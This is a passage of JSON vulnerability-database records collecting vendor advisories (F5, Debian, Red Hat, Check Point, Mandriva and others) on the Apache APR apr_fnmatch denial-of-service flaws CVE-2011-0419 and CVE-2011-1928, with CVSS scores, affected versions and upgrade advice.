"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2016-01-08T23:08:00", "id": "F5:K15920", "href": "https://support.f5.com/csp/article/K15920", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-10-12T02:11:22", "description": "Description\n\nThe fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419. ([CVE-2011-1928](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1928>)) \n\n\nImpact\n\nNone. F5 products are not affected by this vulnerability.\n\nStatus\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None \n| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| Not vulnerable | None \nBIG-IP AAM | None | 11.4.0 - 11.6.0 \n| Not vulnerable | None \nBIG-IP AFM | None | 11.3.0 - 11.6.0 \n| Not vulnerable | None \nBIG-IP Analytics | None | 11.0.0 - 11.6.0 \n| Not vulnerable | None \nBIG-IP APM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| Not vulnerable | None \nBIG-IP ASM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| Not vulnerable | None \nBIG-IP Edge Gateway \n| None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| Not vulnerable | None \nBIG-IP GTM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| Not vulnerable | None \nBIG-IP Link Controller | None \n| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| Not vulnerable | None \nBIG-IP PEM | None \n| 11.3.0 - 11.6.0 \n| Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 \n| Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| Not vulnerable | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 \n| Not vulnerable | None \nEnterprise Manager | None | 3.0.0 - 3.1.1 \n| Not vulnerable | None \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 \n| Not vulnerable | None \nBIG-IQ Cloud | None \n| 4.0.0 - 4.5.0 \n| Not vulnerable | None \nBIG-IQ Device | None \n| 4.2.0 - 4.5.0 \n| Not vulnerable | None \nBIG-IQ Security | None \n| 4.0.0 - 4.5.0 \n| Not vulnerable | None \nBIG-IQ ADC | None \n| 4.5.0 \n| Not vulnerable | None \nLineRate | None \n| 2.5.0 - 2.6.0 \n| Not vulnerable | None \nF5 WebSafe | None \n| 1.0.0 \n| Not vulnerable | None \nTraffix SDC | None \n| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 \n| Not vulnerable | None \n \n**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\nRecommended Action\n\nNone\n\nSupplemental Information\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n", "cvss3": {}, "published": "2015-07-03T02:56:00", "type": "f5", "title": "Apache Portable Runtime vulnerability CVE-2011-1928", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2016-01-09T02:22:00", "id": "F5:K16879", "href": "https://support.f5.com/csp/article/K16879", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:06", "description": "The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419. ([CVE-2011-1928](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1928>)) \n\n", "cvss3": {}, "published": "2015-07-02T00:00:00", "type": "f5", "title": "SOL16879 - Apache Portable Runtime vulnerability CVE-2011-1928", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2015-07-02T00:00:00", "id": "SOL16879", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/800/sol16879.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "altlinux": [{"lastseen": "2023-03-31T19:20:41", "description": "May 13, 2011 Aleksey Avdeev 1.4.4-alt1\n \n \n - New version (1.4.4)\n - Security fixes (CVE-2011-0419)\n", "cvss3": {}, "published": "2011-05-13T00:00:00", "type": "altlinux", "title": "Security fix for the ALT Linux 7 package apr1 version 1.4.4-alt1", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2011-05-13T00:00:00", "id": "DABB2CC2D8A361165855B04C9BC0E98C", "href": "https://packages.altlinux.org/en/p7/srpms/apr1/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:31:24", "description": "A stack overflow vulnerability has been reported in Apache Portable Runtime (APR) library. Apache is a popular HTTP web server. The vulnerability is due to an error in the way the APR parses certain requests with a user specified filter. A remote attacker could exploit this vulnerability by sending specially crafted HTTP requests to an Apache server running the affected APR. Successful attack may lead to a DoS condition on the target server.", "cvss3": {}, "published": "2011-08-16T00:00:00", "type": "checkpoint_advisories", "title": "Apache APR apr_fnmatch Stack Overflow Denial of Service (CVE-2011-0419)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2014-08-17T00:00:00", "id": "CPAI-2011-371", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-04T20:07:41", "description": "A stack overflow vulnerability exists in Apache's APR library. The vulnerability is due to an error in directory file listing function, while parsing requests from a user.", "cvss3": {}, "published": "2011-07-15T00:00:00", "type": "checkpoint_advisories", "title": "Apache APR apr_fnmatch Stack Overflow Denial of Service", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2011-01-01T00:00:00", "id": "CPAI-2011-111", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2021-10-22T00:22:53", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2237-1 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nMay 15, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : apr\nVulnerability : denial of service\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-0419\n\n\nA flaw was found in the APR library, which could be exploited through\nApache HTTPD's mod_autoindex. If a directory indexed by mod_autoindex\ncontained files with sufficiently long names, a remote attacker could\nsend a carefully crafted request which would cause excessive CPU\nusage. This could be used in a denial of service attack.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.2.12-5+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.2-6+squeeze1.\n\nFor the testing distribution (wheezy), this problem will be fixed in\nversion 1.4.4-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.4-1.\n\nWe recommend that you upgrade your apr packages and restart the\napache2 server.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2011-05-15T09:25:17", "type": "debian", "title": "[SECURITY] [DSA 2237-1] apr security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2011-05-15T09:25:17", "id": "DEBIAN:DSA-2237-1:B31B9", "href": "https://lists.debian.org/debian-security-announce/2011/msg00106.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-05-02T16:54:22", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2237-1 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nMay 15, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : apr\nVulnerability : denial of service\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-0419\n\n\nA flaw was found in the APR library, which could be exploited through\nApache HTTPD's mod_autoindex. If a directory indexed by mod_autoindex\ncontained files with sufficiently long names, a remote attacker could\nsend a carefully crafted request which would cause excessive CPU\nusage. This could be used in a denial of service attack.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.2.12-5+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.2-6+squeeze1.\n\nFor the testing distribution (wheezy), this problem will be fixed in\nversion 1.4.4-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.4.4-1.\n\nWe recommend that you upgrade your apr packages and restart the\napache2 server.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2011-05-15T09:25:17", "type": "debian", "title": "[SECURITY] [DSA 2237-1] apr security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2011-05-15T09:25:17", "id": "DEBIAN:DSA-2237-1:D93A8", "href": "https://lists.debian.org/debian-security-announce/2011/msg00106.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-22T00:23:15", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2237-2 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nMay 21, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : apr\nVulnerability : denial of service\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-0419 CVE-2011-1928\nDebian bug : 627182\n\n\nThe recent APR update DSA-2237-1 introduced a regression that could\nlead to an endless loop in the apr_fnmatch() function, causing a\ndenial of service. This update fixes this problem (CVE-2011-1928).\n\nFor reference, the description of the original DSA, which fixed\nCVE-2011-0419:\n\nA flaw was found in the APR library, which could be exploited through\nApache HTTPD's mod_autoindex. If a directory indexed by mod_autoindex\ncontained files with sufficiently long names, a remote attacker could\nsend a carefully crafted request which would cause excessive CPU\nusage. This could be used in a denial of service attack.\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.2.12-5+lenny4.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.2-6+squeeze2.\n\nFor the testing distribution (wheezy), this problem will be fixed in\nversion 1.4.5-1.\n\nFor the unstable distribution (sid), this problem will be fixed in\nversion 1.4.5-1.\n\nWe recommend that you upgrade your apr packages and restart the\napache2 server.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2011-05-21T08:01:12", "type": "debian", "title": "[SECURITY] [DSA 2237-2] apr security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2011-05-21T08:01:12", "id": "DEBIAN:DSA-2237-2:0F0D8", "href": "https://lists.debian.org/debian-security-announce/2011/msg00108.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-05-02T16:54:13", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2237-2 security@debian.org\nhttp://www.debian.org/security/ Stefan Fritsch\nMay 21, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : apr\nVulnerability : denial of service\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2011-0419 CVE-2011-1928\nDebian bug : 627182\n\n\nThe recent APR update DSA-2237-1 introduced a regression that could\nlead to an endless loop in the apr_fnmatch() function, causing a\ndenial of service. This update fixes this problem (CVE-2011-1928).\n\nFor reference, the description of the original DSA, which fixed\nCVE-2011-0419:\n\nA flaw was found in the APR library, which could be exploited through\nApache HTTPD's mod_autoindex. If a directory indexed by mod_autoindex\ncontained files with sufficiently long names, a remote attacker could\nsend a carefully crafted request which would cause excessive CPU\nusage. This could be used in a denial of service attack.\n\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.2.12-5+lenny4.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.2-6+squeeze2.\n\nFor the testing distribution (wheezy), this problem will be fixed in\nversion 1.4.5-1.\n\nFor the unstable distribution (sid), this problem will be fixed in\nversion 1.4.5-1.\n\nWe recommend that you upgrade your apr packages and restart the\napache2 server.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2011-05-21T08:01:12", "type": "debian", "title": "[SECURITY] [DSA 2237-2] apr security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2011-05-21T08:01:12", "id": "DEBIAN:DSA-2237-2:A14B0", "href": "https://lists.debian.org/debian-security-announce/2011/msg00108.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "redhat": [{"lastseen": "2021-10-19T18:41:37", "description": "The Apache Portable Runtime (APR) is a portability library used by the\nApache HTTP Server and other projects. It provides a free library of C data\nstructures and routines.\n\nIt was discovered that the apr_fnmatch() function used an unconstrained\nrecursion when processing patterns with the '*' wildcard. An attacker could\nuse this flaw to cause an application using this function, which also\naccepted untrusted input as a pattern for matching (such as an httpd server\nusing the mod_autoindex module), to exhaust all stack memory or use an\nexcessive amount of CPU time when performing matching. (CVE-2011-0419)\n\nRed Hat would like to thank Maksymilian Arciemowicz for reporting this\nissue.\n\nAll apr users should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. Applications using the apr library,\nsuch as httpd, must be restarted for this update to take effect.\n", "cvss3": {}, "published": "2011-05-11T00:00:00", "type": "redhat", "title": "(RHSA-2011:0507) Moderate: apr security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419"], "modified": "2018-06-06T16:24:32", "id": "RHSA-2011:0507", "href": "https://access.redhat.com/errata/RHSA-2011:0507", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-19T18:42:36", "description": "The Apache Portable Runtime (APR) is a portability library used by the\nApache HTTP Server and other projects. It provides a free library of C data\nstructures and routines.\n\nThe fix for CVE-2011-0419 (released via RHSA-2011:0507) introduced an\ninfinite loop flaw in the apr_fnmatch() function when the APR_FNM_PATHNAME\nmatching flag was used. A remote attacker could possibly use this flaw to\ncause a denial of service on an application using the apr_fnmatch()\nfunction. (CVE-2011-1928)\n\nNote: This problem affected httpd configurations using the \"Location\"\ndirective with wildcard URLs. The denial of service could have been\ntriggered during normal operation; it did not specifically require a\nmalicious HTTP request.\n\nThis update also addresses additional problems introduced by the rewrite of\nthe apr_fnmatch() function, which was necessary to address the\nCVE-2011-0419 flaw.\n\nAll apr users should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. Applications using the apr library,\nsuch as httpd, must be restarted for this update to take effect.\n", "cvss3": {}, "published": "2011-05-31T00:00:00", "type": "redhat", "title": "(RHSA-2011:0844) Low: apr security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2018-06-06T16:24:29", "id": "RHSA-2011:0844", "href": "https://access.redhat.com/errata/RHSA-2011:0844", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-10-19T20:35:37", "description": "JBoss Enterprise Web Server is a fully-integrated and certified set of\ncomponents for hosting Java web applications.\n\nThis is the first release of JBoss Enterprise Web Server for Red Hat\nEnterprise Linux 6. For Red Hat Enterprise Linux 4 and 5, this release\nserves as a replacement for JBoss Enterprise Web Server 1.0.1, and includes\na number of bug fixes. Refer to the Release Notes, linked in the\nReferences, for more information.\n\nThis update corrects security flaws in the following components:\n\ntomcat6:\n\nA cross-site scripting (XSS) flaw was found in the Manager application,\nused for managing web applications on Apache Tomcat. If a remote attacker\ncould trick a user who is logged into the Manager application into visiting\na specially-crafted URL, the attacker could perform Manager application\ntasks with the privileges of the logged in user. (CVE-2010-4172)\n\ntomcat5 and tomcat6:\n\nIt was found that web applications could modify the location of the Apache\nTomcat host's work directory. As web applications deployed on Tomcat have\nread and write access to this directory, a malicious web application could\nuse this flaw to trick Tomcat into giving it read and write access to an\narbitrary directory on the file system. (CVE-2010-3718)\n\nA second cross-site scripting (XSS) flaw was found in the Manager\napplication. A malicious web application could use this flaw to conduct an\nXSS attack, leading to arbitrary web script execution with the privileges\nof victims who are logged into and viewing Manager application web pages.\n(CVE-2011-0013)\n\nA possible minor information leak was found in the way Apache Tomcat\ngenerated HTTP BASIC and DIGEST authentication requests. For configurations\nwhere a realm name was not specified and Tomcat was accessed via a proxy,\nthe default generated realm contained the hostname and port used by the\nproxy to send requests to the Tomcat server. (CVE-2010-1157)\n\nhttpd:\n\nA flaw was found in the way the mod_dav module of the Apache HTTP Server\nhandled certain requests. If a remote attacker were to send a carefully\ncrafted request to the server, it could cause the httpd child process to\ncrash. (CVE-2010-1452)\n\napr:\n\nIt was found that the apr_fnmatch() function used an unconstrained\nrecursion when processing patterns with the '*' wildcard. An attacker could\nuse this flaw to cause an application using this function, which also\naccepted untrusted input as a pattern for matching (such as an httpd server\nusing the mod_autoindex module), to exhaust all stack memory or use an\nexcessive amount of CPU time when performing matching. (CVE-2011-0419)\n\napr-util:\n\nIt was found that certain input could cause the apr-util library to\nallocate more memory than intended in the apr_brigade_split_line()\nfunction. An attacker able to provide input in small chunks to an\napplication using the apr-util library (such as httpd) could possibly use\nthis flaw to trigger high memory consumption. Note: This issue only\naffected the JBoss Enterprise Web Server packages on Red Hat Enterprise\nLinux 4. (CVE-2010-1623)\n\nAll users of JBoss Enterprise Web Server 1.0.1 are advised to upgrade to\nJBoss Enterprise Web Server 1.0.2, which corrects these issues. After\ninstalling this update, the relevant Apache Tomcat service (\"tomcat5\" or\n\"tomcat6\") and the Apache HTTP Server (\"httpd\") must be restarted for the\nupdate to take effect.\n", "cvss3": {}, "published": "2011-06-22T00:00:00", "type": "redhat", "title": "(RHSA-2011:0897) Moderate: JBoss Enterprise Web Server 1.0.2 update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1157", "CVE-2010-1452", "CVE-2010-1623", "CVE-2010-3718", "CVE-2010-4172", "CVE-2011-0013", "CVE-2011-0419", "CVE-2012-4557"], "modified": "2018-06-06T22:42:41", "id": "RHSA-2011:0897", "href": "https://access.redhat.com/errata/RHSA-2011:0897", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:40", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2237-1 security@debian.org\r\nhttp://www.debian.org/security/ Stefan Fritsch\r\nMay 15, 2011 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : apr\r\nVulnerability : denial of service\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2011-0419\r\n\r\n\r\nA flaw was found in the APR library, which could be exploited through\r\nApache HTTPD's mod_autoindex. If a directory indexed by mod_autoindex\r\ncontained files with sufficiently long names, a remote attacker could\r\nsend a carefully crafted request which would cause excessive CPU\r\nusage. This could be used in a denial of service attack.\r\n\r\nFor the oldstable distribution (lenny), this problem has been fixed in\r\nversion 1.2.12-5+lenny3.\r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 1.4.2-6+squeeze1.\r\n\r\nFor the testing distribution (wheezy), this problem will be fixed in\r\nversion 1.4.4-1.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 1.4.4-1.\r\n\r\nWe recommend that you upgrade your apr packages and restart the\r\napache2 server.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niD8DBQFNz5VHbxelr8HyTqQRAr+iAKCCa623GNuK3mENS4jcbZtGep2ohACeJa5s\r\nC1SL03ToxsHEiGJTzNWdiuU=\r\n=G1Is\r\n-----END PGP SIGNATURE-----\r\n", "cvss3": {}, "published": "2011-05-16T00:00:00", "type": "securityvulns", "title": "[SECURITY] [DSA 2237-1] apr security update", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-0419"], "modified": "2011-05-16T00:00:00", "id": "SECURITYVULNS:DOC:26370", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26370", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:42", "description": "CPU resources exhaustion on request to indexed files with long names.", "cvss3": {}, "published": "2011-05-21T00:00:00", "type": "securityvulns", "title": "apr / Apache mod_autoindex DoS", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-0419", "CVE-2011-1928"], "modified": "2011-05-21T00:00:00", "id": "SECURITYVULNS:VULN:11676", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11676", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:40", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2011:095\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : apr\r\n Date : May 20, 2011\r\n Affected: 2009.0, 2010.1, Corporate 4.0, Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n It was discovered that the fix for CVE-2011-0419 under certain\r\n conditions could cause a denial-of-service (DoS) attack in APR\r\n (CVE-2011-1928).\r\n \r\n Packages for 2009.0 are provided as of the Extended Maintenance\r\n Program. Please visit this link to learn more:\r\n 